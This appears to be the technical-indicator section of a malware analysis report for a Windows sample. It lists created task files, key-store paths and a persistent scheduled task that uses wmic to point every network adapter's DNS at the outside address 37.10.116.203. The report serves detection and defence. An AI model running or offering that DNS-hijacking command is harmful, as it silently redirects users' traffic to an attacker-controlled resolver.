Technical information
- %WINDIR%\Tasks\At1.job
- '<SYSTEM32>\PING.EXE' -n 10 localhost
- '<SYSTEM32>\at.exe' 19:56:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")
- <SYSTEM32>\Tasks\At1
- C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\d42cc0c3858a58db2db37658219e6400_fdaad129-04df-4089-bb80-174ce725f721
- <SYSTEM32>\Microsoft\Protect\S-1-5-18\User\d723a3fb-beec-49f0-88be-6aaa1e3760de